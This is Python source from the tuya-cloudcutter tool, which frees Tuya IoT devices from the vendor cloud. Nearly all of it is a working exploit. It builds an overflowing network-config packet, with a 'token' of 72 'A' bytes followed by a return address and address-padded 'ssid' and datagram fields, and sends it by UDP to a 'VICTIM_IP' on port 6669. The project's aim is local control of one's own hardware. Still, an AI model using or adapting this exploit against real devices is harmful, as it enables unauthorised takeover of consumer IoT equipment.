tuya-cloudcutter

A tool that disconnects Tuya IoT devices from the cloud, allowing them to run completely locally.

import random
import socket
import string
import struct
import time
import zlib
from distutils.command.config import config
from typing import Dict

from .device import DeviceConfig

# Upper bound (in bytes) on the payload accepted by
# build_network_config_packet; longer payloads raise ValueError there.
MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8

# UDP destination used by send_network_config_datagram.
VICTIM_IP = "192.168.175.1"
VICTIM_PORT = 6669

# Lengths (in characters) of the random strings generated for the
# corresponding DeviceConfig entries in create_device_specific_config.
LOCAL_KEY_LENGTH = 16
SEC_KEY_LENGTH = 16
DEVICE_ID_LENGTH = 20
# Not referenced in the visible part of this file; presumably the expected
# length of a PSK value -- confirm against callers.
PSK_LENGTH = 32


def build_network_config_packet(payload):
    """Wrap *payload* in the framing used for network-config datagrams.

    Layout (all integers big-endian, 32 bits each):
    prefix ``0x55aa``, frame number, frame type, length, the payload itself,
    CRC32 of everything before it, suffix ``0xaa55``.

    Args:
        payload: Bytes to embed; at most ``MAX_CONFIG_PACKET_PAYLOAD_LEN``
            bytes long.

    Returns:
        The framed packet as ``bytes``.

    Raises:
        ValueError: If the payload exceeds the maximum length.
    """
    if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
        raise ValueError('Payload is too long!')

    frame_prefix = 0x55aa
    frame_suffix = 0xaa55
    frame_number = 0
    frame_type = 0x1
    # The length field counts the payload plus the 8-byte trailer
    # (CRC + suffix).
    trailer_size = 8
    declared_length = len(payload) + trailer_size

    header = struct.pack(
        "!IIII", frame_prefix, frame_number, frame_type, declared_length
    )
    framed = header + payload

    # NOTE: per the disassembly, the frame number and CRC do not appear to be
    # used by the receiver; they are filled in anyway in case they matter.
    checksum = zlib.crc32(framed)
    return framed + struct.pack("!II", checksum, frame_suffix)


def send_network_config_datagram(datagram):
    """Send *datagram* once over UDP to ``(VICTIM_IP, VICTIM_PORT)``.

    The socket is opened for this single send and closed again before
    returning, so repeated calls do not accumulate open file descriptors.
    No reply is read.

    Args:
        datagram: The bytes to transmit.
    """
    # Using the socket as a context manager guarantees it is closed even if
    # sendto() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client:
        client.sendto(datagram, (VICTIM_IP, VICTIM_PORT))


def encode_json_val(value):
    """Backslash-escape double quotes and backslashes in a byte sequence.

    Args:
        value: Iterable of byte values (e.g. ``bytes``).

    Returns:
        A new ``bytes`` object in which every ``"`` and ``\\`` byte is
        preceded by a ``\\`` byte; all other bytes are copied unchanged.
    """
    backslash = 0x5C
    needs_escape = (0x22, backslash)  # '"' and '\'

    out = bytearray()
    for byte in value:
        if byte in needs_escape:
            out.append(backslash)
        out.append(byte)
    return bytes(out)


def check_valid_payload(value):
    """Ensure *value* contains no element equal to zero (no null bytes).

    Args:
        value: Iterable to inspect, typically the payload ``bytes``.

    Returns:
        *value* itself, unchanged, when no zero element is present.

    Raises:
        ValueError: If any element compares equal to ``0``.
    """
    for element in value:
        if element == 0:
            raise ValueError('At least one null byte detected in payload!')
    return value


def generate_random_ascii_string(length):
    """Return a random string of ASCII letters and digits.

    The result is used for key material elsewhere in this file (local key,
    sec key, auth key), so characters are drawn from the operating system's
    entropy source via ``random.SystemRandom`` rather than from the default,
    seedable Mersenne Twister generator.

    Args:
        length: Number of characters to produce.

    Returns:
        A ``str`` of *length* characters, each from ``[A-Za-z0-9]``.
    """
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.SystemRandom().choices(alphabet, k=length))


def create_device_specific_config(args, combined, uuid, auth_key, psk_key=None) -> DeviceConfig:
    """Assemble the ``DeviceConfig`` describing one device.

    Args:
        args: Object exposing ``local_key`` and ``device_id``; when either
            has length zero a random value is generated in its place.
        combined: Mapping providing ``profile`` (with ``firmware.chip``,
            ``name`` and ``sub_name``) and ``slug``.
        uuid: Value stored under ``DeviceConfig.UUID``.
        auth_key: Value stored under ``DeviceConfig.AUTH_KEY``.
        psk_key: Optional value stored under ``DeviceConfig.PSK``; skipped
            when ``None``.

    Returns:
        The populated ``DeviceConfig``.
    """
    device_config = DeviceConfig({})

    device_config.set(DeviceConfig.UUID, uuid)
    device_config.set(DeviceConfig.AUTH_KEY, auth_key)

    # A user-supplied local key wins; otherwise make one up.
    if len(args.local_key) == 0:
        local_key = generate_random_ascii_string(LOCAL_KEY_LENGTH)
    else:
        local_key = args.local_key
    device_config.set(DeviceConfig.LOCAL_KEY, local_key)

    # The sec key is always freshly generated.
    sec_key = generate_random_ascii_string(SEC_KEY_LENGTH)
    device_config.set(DeviceConfig.SEC_KEY, sec_key)

    # Same fallback rule as for the local key.
    if len(args.device_id) == 0:
        device_id = generate_random_ascii_string(DEVICE_ID_LENGTH)
    else:
        device_id = args.device_id
    device_config.set(DeviceConfig.DEVICE_ID, device_id)

    profile = combined["profile"]
    chip_family = profile['firmware']['chip'].upper()
    device_config.set(DeviceConfig.CHIP_FAMILY, chip_family)

    profile_label = profile["name"] + " / " + profile["sub_name"]
    device_config.set(DeviceConfig.PROFILE, profile_label)

    device_config.set(DeviceConfig.DEVICE, combined['slug'])

    if psk_key is not None:
        device_config.set(DeviceConfig.PSK, psk_key)

    return device_config


def exploit_device_with_config(args, combined: Dict) -> DeviceConfig:
    """Build the crafted network-config datagram for a profile and send it.

    Addresses are read from ``combined["profile"]["data"]`` and embedded
    into the ``token``, ``ssid`` and ``passwd`` fields of a hand-assembled
    JSON object. The object is framed with ``build_network_config_packet``,
    padded to 256 bytes, and sent five times (200 ms apart) through
    ``send_network_config_datagram``.

    Args:
        args: Passed through to ``create_device_specific_config``.
        combined: Mapping holding the device profile; ``profile.data`` may
            define ``address_finish``, ``address_ssid``,
            ``address_ssid_padding``, ``address_passwd`` and
            ``address_datagram``.

    Returns:
        The ``DeviceConfig`` built from the freshly generated uuid and
        auth key.

    Raises:
        ValueError: If the assembled payload contains a null byte or is too
            long for a config packet.
    """
    profile_data = combined["profile"]["data"]

    def _stripped_address(key):
        # 3-byte little-endian encoding with trailing zero bytes removed;
        # a missing or zero address therefore becomes b"".
        number = int(profile_data.get(key, "0"), 0)
        return number.to_bytes(length=3, byteorder="little").rstrip(b"\x00")

    finish_addr = _stripped_address("address_finish")
    ssid_addr = _stripped_address("address_ssid")
    ssid_padding = int(profile_data.get("address_ssid_padding", 4))
    passwd_addr = _stripped_address("address_passwd")
    # Unlike the others this one keeps all four bytes, zeros included.
    datagram_addr = int(profile_data.get("address_datagram", "0"), 0)
    datagram_addr = datagram_addr.to_bytes(length=4, byteorder="little")

    uuid = generate_random_ascii_string(12)
    auth_key = generate_random_ascii_string(16)

    # The ssid stays a plain "A" unless the profile supplies an address, in
    # which case it becomes padding (default 4 bytes) followed by the address.
    ssid_field = "A"
    if ssid_addr:
        ssid_field = b"A" * (ssid_padding or 4) + ssid_addr

    # Insertion order is the order the keys appear in the emitted JSON.
    fields = {
        "auzkey": auth_key,
        "uuid": uuid,
        "pskKey": "",
        "prod_test": False,
        "ap_ssid": "A",
        "ssid": ssid_field,
        "token": b"A" * 72 + finish_addr,
    }
    if passwd_addr:
        fields["passwd"] = passwd_addr

    def _json_literal(item):
        # Raw bytes are quoted verbatim (no escaping), booleans become JSON
        # literals, and text is encoded then quoted.
        if isinstance(item, bytes):
            return b'"' + item + b'"'
        if isinstance(item, bool):
            return b'true' if item else b'false'
        return b'"' + item.encode() + b'"'

    members = [
        f'"{name}":'.encode() + _json_literal(item)
        for name, item in fields.items()
    ]
    payload = check_valid_payload(b"{" + b",".join(members) + b"}")
    datagram = build_network_config_packet(payload)

    # NOTE(review): datagram_addr is always four bytes long (it is never
    # stripped), so this branch runs even when the profile defines no
    # address_datagram -- confirm that is intended.
    if datagram_addr:
        # Fill up to 256 bytes: a few "A" bytes for alignment, then the
        # address repeated in whole 4-byte words.
        whole_words, leftover = divmod(256 - len(datagram), 4)
        datagram += b"A" * leftover
        datagram += datagram_addr * whole_words
        assert len(datagram) == 256

    # Send the same datagram several times with a short pause in between.
    for _attempt in range(5):
        send_network_config_datagram(datagram)
        time.sleep(.200)

    return create_device_specific_config(args, combined, uuid, auth_key)